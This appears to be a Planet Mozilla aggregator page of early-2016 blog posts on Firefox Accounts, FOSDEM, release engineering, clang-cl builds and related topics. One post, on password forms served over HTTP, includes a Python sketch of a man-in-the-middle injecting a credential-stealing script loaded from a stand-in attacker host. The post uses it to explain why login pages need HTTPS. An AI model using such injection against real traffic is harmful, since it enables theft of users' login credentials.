Mozilla Addons Blog: Firefox Accounts on AMO |
In order to provide a more consistent experience across all Mozilla products and services, addons.mozilla.org (AMO) will soon begin using Firefox Accounts.
During the first stage of the migration, which will begin in a few weeks, you can continue logging in with your current credentials and use the site as you normally would. Once you’re logged in, you will be asked to log in with a Firefox Account to complete the migration. If you don’t have a Firefox Account, you can easily create one during this process.
Once you are done with the migration, everything associated with your AMO account, such as add-ons you’ve authored or comments you’ve written, will continue to be linked to your account.
A few weeks after that, when enough people have migrated to Firefox Accounts, old AMO logins will be disabled. This means when you log in with your old AMO credentials, you won’t be able to use the site until you follow the prompt to log in with or create a Firefox Account.
For more information, please take a look at the Frequently Asked Questions below, or head over to the forums. We’re here to help, and we apologize for any inconvenience.
All of your add-ons will remain accessible through your new Firefox Account.
Firefox Accounts is the identity system that is used to synchronize Firefox across multiple devices. Many Firefox products and services will soon begin migrating over, simplifying your sign-in process and making it easier for you to manage all your accounts.
Once you have a Firefox Account, you can go to accounts.firefox.com, sign in, and click on Password.
If you have forgotten your current password:
https://blog.mozilla.org/addons/2016/02/01/firefox-accounts-on-amo/
|
Mitchell Baker: Dr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors |
|
The Mozilla Blog: Dr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors |
Today we are very pleased to announce an addition to the Mozilla Corporation Board of Directors, Dr. Karim Lakhani, a scholar in innovation theory and practice.
Dr. Lakhani is the first of the new appointments we expect to make this year. We are working to expand our Board of Directors to reflect a broader range of perspectives on people, products, technology and diversity. That diversity encompasses many factors: from geography to gender identity and expression, cultural to ethnic identity, expertise to education.
Born in Pakistan and raised in Canada, Karim received his Ph.D. in Management from Massachusetts Institute of Technology (MIT) and is Associate Professor of Business Administration at the Harvard Business School, where he also serves as Principal Investigator for the Crowd Innovation Lab and NASA Tournament Lab at the Harvard University Institute for Quantitative Social Science.
Karim’s research focuses on open source communities and distributed models of innovation. Over the years I have regularly reached out to Karim for advice on topics related to open source and community based processes. I’ve always found the combination of his deep understanding of Mozilla’s mission and his research-based expertise to be extremely helpful. As an educator and expert in his field, he has developed frameworks of analysis around open source communities and leaderless management systems. He has many workshops, cases, presentations, and journal articles to his credit. He co-edited a book of essays about open source software titled Perspectives on Free and Open Source Software, and he recently co-edited the upcoming book Revolutionizing Innovation: Users, Communities and Openness, both from MIT Press.
However, what is most interesting to me is the “hands-on” nature of Karim’s research into community development and activities. He has been a supporter and ready advisor to me and Mozilla for a decade.
Please join me now in welcoming Dr. Karim Lakhani to the Board of Directors. He supports our continued investment in open innovation and joins us at the right time, in parallel with Katharina Borchert’s transition off of our Board of Directors into her role as our new Chief Innovation Officer. We are excited to extend our Mozilla network with these additions, as we continue to ensure that the Internet stays open and accessible to all.
Mitchell
|
Air Mozilla: Mozilla Weekly Project Meeting, 01 Feb 2016 |
The Monday Project Meeting
https://air.mozilla.org/mozilla-weekly-project-meeting-20160201/
|
Ludovic Hirlimann: Fosdem 2016 day 2 |
Day 2 was a bit different from day 1, as I was less tired. It started with me visiting a few booths in order to decorate my bag and get a few more T-shirts, thanks to Wikimania, Apache and OpenStack. I retrieved the Mini DisplayPort-to-VGA cable I had left in the conference room and then headed for the talks.
The first one, “Active supervision and monitoring with Salt, Graphite and Grafana”, was interesting because I knew nothing about any of these tools except Graphite, and even that only barely, so I learned a lot.
The second one, titled “War Story: Puppet in a Traditional Enterprise”, was about implementing Puppet at enterprise scale in a big company. It reminded me of all the big companies I had consulted for a few years back; nothing surprising, but it was quite interesting anyway.
The third talk I attended was about hardening and securing configuration management software. It was more about general principles than a howto. Quite interesting, especially the hardening.io link given at the end of the documentation, and the idea of removing ssh from all servers where possible and re-enabling it through configuration management when needed to investigate issues. I didn’t learn much, but it was a good refresher.
I then attended a talk, in a very small and absolutely packed room, about mapping with your phone. As I’ve started contributing to OSM, it was nice to listen and discover all the other apps I can run on my Android phone to add data to the maps. I’ll probably share that next month at the local OSM meeting that was announced this weekend.
Last but not least, I attended the key signing party. According to my paperwork, I’ll have to sign 98 keys twice (twice because I’m creating a new key).
I’ve of course added a few pictures to my Fosdem set.
|
Kartikaya Gupta: Frameworks vs libraries (or: process shifts at Mozilla) |
At some point in the past, I learned about the difference between frameworks and libraries, and it struck me as a really important conceptual distinction that extends far beyond just software. It's really a distinction in process, and that applies everywhere.
The fundamental difference between frameworks and libraries is that when dealing with a framework, the framework provides the structure, and you have to fill in specific bits to make it apply to what you are doing. With a library, however, you are provided with a set of functionality, and you invoke the library to help you get the job done.
It may not seem like a very big distinction at first, but it has a huge impact on various properties of the final product. For example, a framework is easier to use if what you are trying to do lines up with the goal the framework is intended to accomplish. The only thing you need to do is provide (or override) specific things that you need to customize, and the framework takes care of the rest. It's like a builder building your house, and you picking which tile pattern you want for the backsplash. With libraries there's a lot more work - you have a Home Depot full of tools and supplies, but you have to figure out how to put them together to build a house yourself.
The flip side, of course, is that with libraries you get a lot more freedom and customizability than you do with frameworks. With the house analogy, a builder won't add an extra floor for your house if it doesn't fit with their pre-defined floorplans for the subdivision. If you're building it yourself, though, you can do whatever you want.
The library approach makes the final workflow a lot more adaptable when faced with new situations. Once you are in a workflow dictated by a framework, it's very hard to change the workflow because you have almost no control over it - you only have as much control as it was designed to let you have. With libraries you can drop a library here, pick up another one there, and evolve your workflow incrementally, because you can use them however you want.
In the context of building code, the *nix toolchain (a pile of command-line tools that do very specific things) is a great example of the library approach - it's very adaptable as you can swap out commands for other commands to do what you need. An IDE, on the other hand, is more of a framework. It's easier to get started because the heavy lifting is taken care of, all you have to do is "insert code here". But if you want to do some special processing of the code that the IDE doesn't allow, you're out of luck.
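To make the distinction concrete, here is a small illustrative sketch in Python (all names are made up, not from any real project): with a library, your code owns the control flow and calls into the library; with a framework, the framework owns the control flow and calls the hooks you fill in.

```python
# Library style: your code drives, and calls library functions when useful.
def render_page(title, body):
    return f"<h1>{title}</h1><p>{body}</p>"

html = render_page("Hello", "I drive the program; the library helps.")

# Framework style: the framework drives, and calls your overridden hooks.
class PageFramework:
    def run(self):
        # The framework decides when (and whether) your hooks are called.
        return f"<h1>{self.title()}</h1><p>{self.body()}</p>"

    def title(self):
        raise NotImplementedError  # a blank you must fill in

    def body(self):
        raise NotImplementedError

class MyPage(PageFramework):
    def title(self):
        return "Hello"

    def body(self):
        return "The framework drives; I only fill in the blanks."

html2 = MyPage().run()
```

The inversion of control in the second half is exactly why frameworks are easy when your goal matches theirs and rigid when it doesn't: run() belongs to the framework, not to you.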
An interesting thing to note is that usually people start with frameworks and move towards libraries as their needs get more complex and they need to customize their workflow more. It's not often that people go the other way, because once you've already spent the effort to build a customized workflow it's hard to justify throwing the freedom away and locking yourself down. But that's what it feels like we are doing at Mozilla - sometimes on purpose, and sometimes unintentionally, without realizing we are putting on a straitjacket.
The shift from Bugzilla/Splinter to MozReview is one example of this. Going from a customizable, flexible tool (attachments with flags) to a unified review process (push to MozReview) is a shift from libraries to frameworks. It forces people to conform to the workflow which the framework assumes, and for people used to their own customized, library-assisted workflow, that's a very hard transition. Another example of a shift from libraries to frameworks is the bug triage process that was announced recently.
I think in both of these cases the end goal is desirable and worth working towards, but we should realize that it entails (by definition) making things less flexible and adaptable. In theory the only workflows that we eliminate are the "undesirable" ones, e.g. a triage process that drops bugs on the floor, or a review process that makes patch context hard to access. In practice, though, other workflows - both legitimate workflows currently being used and potential improved workflows get eliminated as well.
Of course, things aren't all as black-and-white as I might have made them seem. As always, the specific context/situation matters a lot, and it's always a tradeoff between different goals - in the end there's no one-size-fits-all and the decision is something that needs careful consideration.
|
Ludovic Hirlimann: Fosdem 2016 day 1 |
This year I’m attending FOSDEM, after skipping it last year. It’s good to be back, even if I was very tired when I arrived yesterday night, having managed to visit three of Brussels’ train stations on the way. I was up early, and the indications on bus 71 were fucked up, so it took me a short walk under some rain to get to the campus, but I made it early and was able to take interesting pictures of the empty venue.
The first talk I attended was about MIPS for the embedded world. It was interesting for some tidbits, but felt more like a marketing pitch for using MIPS in future embedded projects.
After that I wandered around, found a bunch of ex-Joosters, and had very interesting conversations with all of them.
I delivered my talk in 10 minutes and then answered questions for the next 20 minutes.
The HTTP/2 talk was interesting and the room was packed, but it was probably not deep enough for me. Still, I think we should think about enabling HTTP/2 on mozfr.org.
I left to get some rest after talking to Otto about blockchains and bitcoins.
|
Mike Hommey: Enabling TLS on this blog |
Long overdue, I finally enabled TLS on this blog. It went almost like a breeze.
I used simp_le to get the certificate from Let’s Encrypt, along with Mozilla’s Web Server Configuration generator. SSL Labs now reports a rating of A+.
I just had a few issues:

- include statements,
- ssl_session_tickets off; makes browsers unhappy (at least, it made my Firefox unhappy, with an SSL_ERROR_RX_UNEXPECTED_NEW_SESSION_TICKET error message).

I’m glad that there are tools helping to get a proper configuration of SSL. It is sad, though, that the defaults are not better and that we still need to tweak at all. Setting where the certificate and the private key files are should, in 2016, be the only thing to do to have a secure web server.
|
Chris Cooper: RelEng & RelOps Weekly Highlights - January 29, 2016 |
Well, that was a quick month! Time flies when you’re having fun…or something.
Modernize infrastructure:
In an effort to be more agile in creating and/or migrating webapps, Releng has a new domain name and SSL wildcard! The new domain (mozilla-releng.net) is set up for management under inventory, and an SSL endpoint has been established in Heroku. See https://wiki.mozilla.org/ReleaseEngineering/How_Tos/Heroku:Add_a_custom_domain
Improve CI pipeline:
Coop (hey, that’s me!) re-enabled partner repacks as part of release automation this week, and was happy to see the partner repacks for the Firefox 44 release get generated and published without any manual intervention. Back in August, we moved the partner repack process and configuration from Mercurial into GitHub. This made it trivially easy for Mozilla partners to issue a pull request (PR) when a configuration change was needed. This did require some re-tooling on the automation side, and we took the opportunity to fix and update a lot of partner-related cruft, including moving the repack hosting to S3. I should note that the EME-free repacks are also generated automatically now as part of this process, so those of you who prefer less DRM with your Firefox can now also get your builds on a regular basis.
Release:
One of the main reasons why build promotion is so important for releng and Mozilla is that it removes the current disconnect between the nightly/aurora and beta/release build processes, the builds for which are created in different ways. This is one of the reasons why uplift cycles are so frequently “interesting” - build process changes on nightly and aurora often have no existing analog in beta/release. And so it was this past Tuesday when releng started the beta1 process for Firefox 45. We quickly hit a blocker issue related to gtk3 support that prevented us from even running the initial source builder, a prerequisite for the rest of the release process. Nick, Rail, Callek, and Jordan put their heads together and quickly came up with an elegant solution that unblocked progress on all the affected branches, including ESR. In the end, the solution involved running tooltool from within a mock environment, rather than running it outside the mock environment and trying to copy relevant pieces in. Thanks for the quick thinking and extra effort to get this unblocked. Maybe the next beta1 cycle won’t suck quite as much!

The patch that Nick prepared (https://bugzil.la/886543) is now in production and being used to notify users on unsupported versions of GTK why they can’t update. In the past, they would’ve simply received no update with no information as to why.
Operational:
Dustin made security improvements to TaskCluster, ensuring that expired credentials are not honored.
We had a brief Balrog outage this morning [Fri Jan 29]. Balrog is the server side component of the update system used by Firefox and other Mozilla products. Ben quickly tracked the problem down to a change in the caching code. Big thanks to mlankford, Usul, and w0ts0n from the MOC for their quick communication and help in getting things back to a good state quickly.
Outreach:
On Wednesday, Dustin spoke at Siena College, holding an information session on Google Summer of Code and speaking to a Software Engineering class about Mozilla, open source, and software engineering in the real world.
See you next week!
|
Air Mozilla: Foundation Demos January 29 2016 |
Mozilla Foundation Demos January 29 2016
|
Yunier José Sosa Vázquez: Visualizando lo invisible |
This is a translation of the original article published on The Mozilla Blog. Written by Jascha Kaykas-Wolff.

These days, privacy and threats like invisible third-party tracking on the Web seem very abstract. Many of us are not aware of what is happening with our data online, or we feel powerless because we don’t know what to do. Increasingly, the Internet is becoming a giant glass house where your personal information is exposed to third parties who collect it and use it for their own purposes.

We recently launched Private Browsing with Tracking Protection in Firefox, a feature focused on giving anyone who uses Firefox a meaningful choice with respect to third parties on the Web that could collect their data without their knowledge or control. This is a feature that addresses the need for greater control over online privacy, but it is also connected to an ongoing and important debate around preserving a healthy, open and sustainable Web ecosystem, and around the problems with, and possible solutions to, content blocking.

Earlier this month we held a three-day event on online privacy in Hamburg, Germany. Today, we would like to share some impressions from the event, as well as an experiment we filmed on the famous Reeperbahn.

Our experiment

We set out to see whether we could explain something that is not easily visible, online privacy, in a very tangible way. We built an apartment fully equipped with everything needed to enjoy a short trip to the pearl of northern Germany, and made it available to various travelers who came to spend the night. Once they connected to the apartment’s Wi-Fi, all the walls were removed, exposing the travelers to onlookers and to the outside commotion caused
|
Daniel Glazman: Google, BlueGriffon.org and blacklists |
Several painful things happened to bluegriffon.org yesterday... In chronological order:
I need to draw a few conclusions here:
Update: oh, and I forgot one thing: during the evening, Earthlink.net blacklisted one of the Mail Transport Agents of Dreamhost. Not just my email address: that whole SMTP gateway at Dreamhost. So all my emails to one of my customers bounced and I can’t even let her know some crucial information. I suppose thousands of Dreamhost customers are impacted. I reported the issue to both Earthlink and DH, of course.
|
Karl Dubost: [worklog] APZ bugs, Some webcompat bugs and HTTP Refresh |
Monday, January 25, 2016. It’s morning in Japan. The office room temperature is around 3°C (37.4°F). I just turned on the Aladdin heater. Sleep was short, or more exactly, interrupted a couple of times. Let’s go through emails after two weeks away.
My tune for WebCompat for this first quarter 2016 is Jurassic 5 - Quality Control.
Multi-Factor Authentication is sold in the computing industry as both easier and more secure. I still have to be convinced about the easier part.
- @media screen and (-webkit-min-device-pixel-ratio:2) {} in the CSS. One difference is that the images are set through content on a pseudo-element outside of the media query, but directly on the element itself inside it. It is currently a non-standard feature, as explained by Daniel Holbert. We contacted them. A discussion has been started and the magical Daniel dived a bit deeper into the issue. Read it.
- head. As a result, users have more difficulty adding the search for specific locales. Contacted.
- http://cse.google.com/url? instead of http://www.google.com/url?. This is unfortunate because http://cse.google.com/url? is a 404.
- em and px in a design: you always risk that the fonts and rounding of values will not be exactly the same in all browsers.

There's a list of scrolling bugs which affect Firefox. The issue is documented on MDN:
These effects work well in browsers where the scrolling is done synchronously on the browser's main thread. However, most browsers now support some sort of asynchronous scrolling in order to provide a consistent 60 frames per second experience to the user. In the asynchronous scrolling model, the visual scroll position is updated in the compositor thread and is visible to the user before the scroll event is updated in the DOM and fired on the main thread. This means that the effects implemented will lag a little bit behind what the user sees the scroll position to be. This can cause the effect to be laggy, janky, or jittery — in short, something we want to avoid.
So if you know someone (or a friend of a friend) who can fix one of these APZ bugs, or who can put us in contact with the site owners, please tell us in the bug comments or on IRC (#webcompat on irc.mozilla.org). I did a first pass of bug triage for contacting the sites.
- a name attribute used for storing a JSON data structure, with quotes escaped so that they would not be mangled by the HTML. Crazy!

Some of these bugs are not yet mature in terms of outreach status. With Add-ons/e10s and APZ, it might happen more often that the Web Compat team is asked to reach out to sites which have quirks, specific code hindering Firefox, etc. But reaching out to a Web site first requires a couple of steps and some understanding. I need to write something about this. Added to my TODO list.
It is difficult to make progress in some cases, because the developers have completely disappeared. I wonder in some cases if it would not be better to just remove the add-on from the add-ons list entirely. That would give someone else the chance to propose something if users need it (nature abhors a vacuum), and/or give the main developer a reason to wake up and wonder why the add-on is not downloadable anymore.
We had a meeting (https://wiki.mozilla.org/Compatibility/Mobile/2016-01-26). We discussed APZ, the WebCompat wiki, Firefox OS Tier 3, and the status of WebKit CSS bugs.
First come the emails addressed to me directly in the To: field (dynamic mailbox), then the ones where I’m flagged for needinfo in Bugzilla, then finally the ones addressed to specific mailing lists where I have work to do. For the rest: a rapid scan of the topics (good email topics are important. Remember!) and marking as read all the ones I have no interest in. I’m almost done in one day with all these emails.

Otsukare!
|
Ehsan Akhgari: Building Firefox With clang-cl: A Status Update |
Last June, I wrote about enabling building Firefox with clang-cl. We didn’t get these builds up on the infrastructure, things regressed on both the Mozilla and LLVM sides, and we got to a state where clang-cl either wouldn’t compile Firefox any more, or the resulting build would be severely broken. It took us months, but earlier today we finally managed to get a full x86-64 Firefox build with clang-cl! The build works for basic browsing (except that it crashes on yahoo.com for reasons we haven’t diagnosed yet), and just for extra fun, I ran all of our service worker tests (which I happen to run many times a day on other platforms) and they all passed.
This time, we got to an impressive milestone. Previously, we were building Firefox with the help of clang-cl’s fallback mode (which falls back to MSVC when clang fails to build a file for whatever reason) but this time we have a build of Firefox that is fully produced with clang, without even using the MSVC compiler once. And that includes all of our C++ tests too. (Note that we still use the rest of the Microsoft toolchain, such as the linker, resource compiler, etc. to produce the ultimate binaries; I’m only focusing on C and C++ compilation in this post.)
We should now try to keep these builds working. I believe that this is a big opportunity for Firefox to be able to leverage, on Windows, where we have most of our users, the modern toolchain that we have been enjoying on other platforms. An open source compilation toolchain has long been needed on Windows, and clang-cl is the first open source replacement that is designed to be a drop-in replacement for MSVC, which makes it an ideal target for Firefox. Also, Microsoft’s recent integration of clang as a front-end for the MSVC code generator promises the prospect of switching to clang/C2 in the future as our default compiler on Windows (assuming that the performance of our clang-cl builds doesn’t end up being on par with the MSVC PGO compiler).
My next priority for this project would be to stand up Windows static analysis builds on TreeHerder. That requires getting our clang-plugin to work on Windows, fixing the issues that it may find (since that would be the first time we would be running our static analyses on Windows!), and trying to get them up and running on TaskCluster. That way we would be able to leverage our static analysis on Windows as the first fruit of this effort, and also keep these builds working in the future. Since clang-cl is still being heavily developed, we will be preparing periodic updates to the compiler, potentially fixing the issues that may have been uncovered in either Firefox or LLVM and therefore we will keep up with the development in both projects.
Some of the future things that I think we should look into, sorted by priority:
Longer term, we can look into things such as adding support for full debug information, with the goal of making it possible to debug these builds with Visual Studio on Windows. Right now, we basically debug at the assembly level. Facilitating this would probably help speed up development too, so perhaps we should start on it earlier. There is also LLDB on Windows, which should in theory be able to consume the DWARF debug information that clang-cl can generate, similar to how it does on Linux, so that is worth looking into as well. I’m sure there are other things that I’m not currently thinking of that we could do as well.
Last but not least, this has been a collaboration between quite a few people: on the Mozilla side, Jeff Muizelaar, David Major, Nathan Froyd, Mike Hommey, Raymond Forbes and myself; and on the LLVM side, many members of the Google compiler and Chromium teams: Reid Kleckner, David Majnemer, Hans Wennborg, Richard Smith, Nico Weber, Timur Iskhodzhanov, and the rest of the LLVM community who made clang-cl possible. I’m sure I’m forgetting some important names. I would like to thank all of these people for their help and effort.
https://ehsanakhgari.org/blog/2016-01-29/building-firefox-with-clang-cl-a-status-update
|
Air Mozilla: Privacy Lab - Privacy for Startups - January 2016 |
Privacy for Startups: Practical Guidance for Founders, Engineers, Marketing, and those who support them. Startups often espouse mottos that make traditional Fortune 500 companies cringe....
https://air.mozilla.org/privacy-lab-privacy-for-startups-january-2016/
|
Tanvi Vyas: No More Passwords over HTTP, Please! |
Firefox Developer Edition 46 warns developers when login credentials are requested over HTTP.
Username and password pairs control access to users’ personal data. Websites should handle this information with care and only request passwords over secure (authenticated and encrypted) connections, like HTTPS. Unfortunately, we too frequently see non-secure connections, like HTTP, used to handle user passwords. To inform developers about this privacy and security vulnerability, Firefox Developer Edition warns developers of the issue by changing the security iconography of non-secure pages to a lock with a red strikethrough.
Firefox determines if a password field is secure by examining the page it is embedded in. The embedding page is checked against the algorithm in the W3C’s Secure Contexts Specification to see if it is secure or non-secure. Anything on a non-secure page can be manipulated by a Man-In-The-Middle (MITM) attacker. The MITM can use a number of mechanisms to extract the password entered onto the non-secure page. Here are some examples:
Note that all of the attacks mentioned above can occur without the user realizing that their account has been compromised.
Firefox has been alerting developers of this issue via the Developer Tools Web Console since Firefox 26.
We get this question a lot, so I thought I would call it out specifically. Although transmitting over HTTPS instead of HTTP does prevent a network eavesdropper from seeing a user’s password, it does not prevent an active MITM attacker from extracting the password from the non-secure HTTP page. As described above, active attackers can MITM an HTTP connection between the server and the user’s computer to change the contents of the webpage. The attacker can take the HTML content that the site attempted to deliver to the user and add javascript to the HTML page that will steal the user’s username and password. The attacker then sends the updated HTML to the user. When the user enters their username and password, it will get sent to both the attacker and the site.
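As a rough sketch of the attack described above (the attacker host and all names here are hypothetical, purely for illustration), an active MITM who controls the non-secure HTTP response can inject a credential-stealing script with a one-line rewrite, no matter where the form submits:

```python
# The attacker sees and controls the plaintext HTTP response body, so a
# simple string substitution is enough to plant a script that can read
# the username/password fields as the user types.
STEALER = '<script src="https://attacker.example/steal.js"></script>'

def mitm_tamper(http_response_html):
    # Inject the script just before </head>; the page otherwise looks
    # identical to the user, and the form still submits to HTTPS.
    return http_response_html.replace("</head>", STEALER + "</head>")

original = (
    "<html><head><title>Login</title></head><body>"
    "<form action='https://example.com/login' method='post'>"
    "<input name='user'><input name='pass' type='password'>"
    "</form></body></html>"
)
tampered = mitm_tamper(original)
```

This is why only serving the page itself over HTTPS removes the attacker's ability to rewrite it in the first place.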
Sometimes sites require username and passwords, but don’t actually store data that is very sensitive. For example, a news site may save which news articles a user wants to go back and read, but not save any other data about a user. Most users don’t consider this highly sensitive information. Web developers of the news site may be less motivated to secure their site and their user credentials. Unfortunately, password reuse is a big problem. Users use the same password across multiple sites (news sites, social networks, email providers, banks). Hence, even if access to the username and password to your site doesn’t seem like a huge risk to you, it is a great risk to users who have used the same username and password to login to their bank accounts. Attackers are getting smarter; they steal username/password pairs from one site, and then try reusing them on more lucrative sites.
Put your login forms on HTTPS pages.
Of course, the most straightforward way to do this is to move your whole website to HTTPS. If you aren’t able to do this today, create a separate HTTPS page that is just used for logins. Whenever a user wants to login to your site, they will visit the HTTPS login page. If your login form submits to an HTTPS endpoint, parts of your domain may already be set up to use HTTPS.
In order to host content over HTTPS, you need a TLS Certificate from a Certificate Authority. Let’s Encrypt is a Certificate Authority that can issue you free certificates. You can reference these pages for some guidance on configuring your servers.
We know that users of Firefox Developer Edition don’t only use Developer Edition to work on their own websites. They also use it to browse the net. Developers who see this warning on a page they don’t control can still take a couple of actions. You can try to add “https://” to the beginning of the url in the address bar and see if you are able to login over a secure connection to help protect your data. You can also try and reach out to the website administrator and alert them of the privacy and security vulnerability on their site.
There are ample examples of password reuse leading to large scale compromise. There are fewer well-known examples of passwords being stolen by performing MITM attacks on login forms, but the basic techniques of javascript injection have been used at scale by Internet Service Providers and governments.
Sometimes password fields are in a hidden
Right now, the focus for this feature is on developers, since they’re the ones that ultimately need to fix the sites that are exposing users’ passwords. In general, though, since we are working on deprecating non-secure HTTP in the long run, you should expect to see more and more explicit indications of when things are not secure. For example, in all current versions of Firefox, the Developer Tools Network Monitor shows the lock with a red strikethrough for all non-secure HTTP connections.
Users of Firefox version 44+ (on any branch) can enable or disable this feature by following these steps:
A special thanks to Paolo Amadini and Aislinn Grigas for their implementation and user experience work on this feature!
https://blog.mozilla.org/tanvi/2016/01/28/no-more-passwords-over-http-please/
|
Support.Mozilla.Org: What’s up with SUMO – 28th January |
Hello, SUMO Nation!
Starting from this week, we’re moving things around a bit (to keep them fresh and give you more time to digest and reply). The Friday posts are moving to Thursday, and Fridays will be open for guest posts (including yours) – if you’re interested in writing a post for this blog, let me know in the comments.
We salute you!
That’s it for today, dear SUMOnians! We still have Friday to enjoy, so see you around SUMO and not only… tomorrow!
https://blog.mozilla.org/sumo/2016/01/28/whats-up-with-sumo-28th-january/
|
Air Mozilla: Web QA Weekly Meeting, 28 Jan 2016 |
This is our weekly gathering of Mozilla's Web QA team filled with discussion on our current and future projects, ideas, demos, and fun facts.
|
Air Mozilla: Reps weekly, 28 Jan 2016 |
This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.
|
Mark Surman: Inspired by our grassroots leaders |
Last weekend, I had the good fortune to attend our grassroots Leadership Summit in Singapore: a hands-on learning and planning event for leaders in Mozilla’s core contributor community.
We’ve been doing these sorts of learning / planning / doing events with our broader community of allies for years now: they are at the core of the Mozilla Leadership Network we’re rolling out this year. It was inspiring to see the participation team and core contributor community dive in and use a similar approach.
I left Singapore feeling inspired and hopeful — both for the web and for participation at Mozilla. Here is an email I sent to everyone who participated in the Summit explaining why:
As I flew over the Pacific on Monday night, I felt an incredible sense of inspiration and hope for the future of the web — and the future of Mozilla. I have all of you to thank for that. So, thank you.
This past weekend’s Leadership Summit in Singapore marked a real milestone: it was Mozilla’s first real attempt at an event consciously designed to help our core contributor community (that’s you!) develop important skills like planning and dig into critical projects in areas like connected devices and campus outreach all at the same time. This may not seem like a big deal. But it is.
For Mozilla to succeed, *all of us* need to get better at what we do. We need to reach and strive. The parts of the Summit focused on personality types, planning and building good open source communities were all meant to serve as fuel for this: giving us a chance to hone skills we need.
Actually getting better comes by using these skills to *do* things. The campus campaign and connected devices tracks at the Summit were designed to make this possible: to get us all working on concrete projects while applying the skills we were learning in other sessions. The idea was to get important work done while also getting better. We did that. You did that.
Of course, it’s the work and the impact we have in the world that matter most. We urgently need to explore what the web — and our values — can mean in the coming era of the internet of things. The projects you designed in the connected devices track are a good step in this direction. We also need to grow our community and get more young people involved in our work. The plans you made for local campus campaigns focused on privacy will help us do this. This is important work. And, by doing it the way we did it, we’ve collectively teed it up to succeed.
I’m saying all this partly out of admiration and gratitude. But I’m also trying to highlight the underlying importance of what happened this past weekend: we started using a new approach to participation and leadership development. It’s an approach that I’d like to see us use even more both with our core participation leaders (again, that’s you!) and with our Mozilla Leadership Network (our broader network of friends and allies). By participating so fully and enthusiastically in Singapore, you helped us take a big step towards developing this approach.
As I said in my opening talk: this is a critical time for the web and for Mozilla. We need to simultaneously figure out what technologies and products will bring our values into the future and we need to show the public and governments just how important those values are. We can only succeed by getting better at working together — and by growing our community around the world. This past weekend, you all made a very important step in this direction. Again, thank you.
I’m looking forward to all the work and exploration we have ahead. Onwards!
As I said in my message, the Singapore Leadership Summit is a milestone. We’ve been working to recast and rebuild our participation team for about a year now. This past weekend I saw that investment paying off: we have a team teed up to grow and support our contributor community from around the world. Nicely done! Good things ahead.
The post Inspired by our grassroots leaders appeared first on Mark Surman.
http://marksurman.commons.ca/2016/01/28/inspired-by-our-grassroots-leaders/
|